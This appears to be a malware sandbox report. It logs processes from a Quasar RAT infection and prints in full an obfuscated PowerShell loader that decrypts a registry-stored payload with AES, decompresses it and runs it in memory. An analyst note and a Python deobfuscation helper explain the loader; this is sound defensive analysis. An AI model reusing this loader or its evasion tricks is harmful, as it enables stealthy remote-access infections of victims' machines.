'').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join 
'')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
                                                                                                          Imagebase:0x7ff654820000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000F.00000002.3570248897.000001FACD23D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          • Detection: 0%, Virustotal
                                                                                                          Has exited:false

                                                                                                          Target ID:16
                                                                                                          Start time:16:35:20
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:17
                                                                                                          Start time:16:35:20
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:19
                                                                                                          Start time:16:35:24
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\$sxr-powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = 
$qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process 
-ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
                                                                                                          Imagebase:0x7ff654820000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Has exited:false

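The Target ID 19 command line above is a staged PowerShell loader run from a renamed copy of powershell.exe (C:\Windows\$sxr-powershell.exe) with -ExecutionPolicy bypass. It hides every .NET member name as a reversed literal that is re-reversed at runtime with [-1..-N] indexing (so 'gnirtS46esaBmorF'[-1..-16] becomes FromBase64String), decrypts its strings and payload with AES-CBC under a hard-coded key and IV, GZip-decompresses the result, and maps it in memory with Assembly.Load followed by EntryPoint.Invoke. The Python below is an analyst helper added to this report; it is not the sample's code and not Joe Sandbox output. It undoes the name obfuscation statically and recovers the cipher parameters. SAMPLE is a constructed excerpt copied from the command line above (the VOHZF, nnKof and vzvJZ helpers plus one string-decryption stanza), and the Python function and variable names are my own.

```python
"""Static first-pass triage of the reversed-name PowerShell loader pattern seen in the
Target ID 19 command line.  Analyst example added to this report; not the sample's code
and not sandbox output.  Standard library only, so it runs offline."""
import base64
import re

# Every .NET member name is a reversed literal re-reversed at runtime by negative-range
# indexing, e.g. ('gnirtS46esaBmorF'[-1..-16] -join '')  ->  FromBase64String
_REVERSED_NAME = re.compile(r"\('([^']+)'\[-1\.\.-(\d+)\] -join ''\)")
_B64_ARG = re.compile(r"\[System\.Convert\]::FromBase64String\('([A-Za-z0-9+/=]+)'\)")
_KEY = re.compile(r"\.Key\s*=\s*\[System\.Convert\]::FromBase64String\('([^']+)'\)")
_IV = re.compile(r"\.IV\s*=\s*\[System\.Convert\]::FromBase64String\('([^']+)'\)")


def deobfuscate_reversed_names(script: str) -> str:
    """Rewrite each ('...'[-1..-N] -join '') into the plain member name.

    [-1..-N] selects the last N characters in reverse order, so the result is the
    reversed literal truncated to N characters (the loader always uses N == len)."""
    def _plain(m):
        literal, n = m.group(1), int(m.group(2))
        return literal[::-1][:n]
    return _REVERSED_NAME.sub(_plain, script)


def extract_aes_params(script: str) -> dict:
    """Recover the hard-coded key/IV and cipher settings from a deobfuscated script."""
    key = base64.b64decode(_KEY.search(script).group(1))
    iv = base64.b64decode(_IV.search(script).group(1))
    mode = re.search(r"CipherMode\]::(\w+)", script).group(1)
    padding = re.search(r"PaddingMode\]::(\w+)", script).group(1)
    return {
        "cipher": f"AES-{len(key) * 8}-{mode}",   # key length tells AES-128/192/256
        "padding": padding,
        "key_hex": key.hex(),
        "iv_hex": iv.hex(),
        "key_len": len(key),
        "iv_len": len(iv),
    }


def extract_ciphertexts(script: str) -> list:
    """Every Base64 argument that is not the key or IV is an encrypted string or payload.
    Returns (base64, decoded_length) pairs; CBC ciphertext lengths are multiples of 16."""
    key_iv = {_KEY.search(script).group(1), _IV.search(script).group(1)}
    seen, out = set(), []
    for b64 in _B64_ARG.findall(script):
        if b64 in key_iv or b64 in seen:
            continue
        seen.add(b64)
        out.append((b64, len(base64.b64decode(b64))))
    return out


def summarize_loader(obfuscated: str) -> dict:
    """One-shot triage: deobfuscate names, pull crypto parameters, flag the load chain."""
    plain = deobfuscate_reversed_names(obfuscated)
    return {
        "deobfuscated": plain,
        "aes": extract_aes_params(plain),
        "ciphertexts": extract_ciphertexts(plain),
        "reflective_load": "[System.Reflection.Assembly]::Load(" in plain,
        "gzip_stage": "System.IO.Compression.GZipStream" in plain,
    }


# Constructed sample: the three helper functions and one string-decryption stanza copied
# from the Target ID 19 command line above (an excerpt, not the full script).
SAMPLE = (
    "function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); "
    "$xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; "
    "$xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; "
    "$xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); "
    "$xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); "
    "$CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); "
    "$oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); "
    "$CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}"
    "function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); "
    "$FswzF=New-Object System.IO.MemoryStream; "
    "$ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); "
    "$ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}"
    "function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); "
    "$OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}"
    "$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');"
    "$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);"
    "$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);"
)

if __name__ == "__main__":
    summary = summarize_loader(SAMPLE)
    print(summary["deobfuscated"])
    print(summary["aes"], summary["ciphertexts"], summary["reflective_load"], summary["gzip_stage"])
```

This static pass only exposes the decryption routine, it does not decrypt anything. The second stage of the real command line resolves the Registry hive, OpenSubKey/GetValue-style member names, the key path, CompressionMode, Load and Invoke from strings that are themselves AES-encrypted ($UMIrZ, $UMIrZ0-$UMIrZ3, $tgmGC, $BdNHQ, $UFhRe, $MrvyW), so the plaintexts have to be recovered with the key and IV extracted here using a crypto library, or by letting the script run under instrumentation. Two further details worth noting from the command line: it begins with WaitForExit on PID 6400 and a 5-second sleep, which is how a short-running sandbox can miss the payload, and the payload itself is not in the script but is read from a registry value and split on '\' into two Base64 blobs, one decrypted and loaded through VOHZF, nnKof and vzvJZ and the other through an inline copy of the same AES/GZip/Assembly.Load chain.
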
                                                                                                          Target ID:20
                                                                                                          Start time:16:35:24
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:21
                                                                                                          Start time:16:35:24
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:22
                                                                                                          Start time:16:35:24
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\winlogon.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:winlogon.exe
                                                                                                          Imagebase:0x7ff70f350000
                                                                                                          File size:906'240 bytes
                                                                                                          MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:23
                                                                                                          Start time:16:35:25
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:24
                                                                                                          Start time:16:35:25
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\lsass.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\lsass.exe
                                                                                                          Imagebase:0x7ff7ac940000
                                                                                                          File size:59'456 bytes
                                                                                                          MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:25
                                                                                                          Start time:16:35:25
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
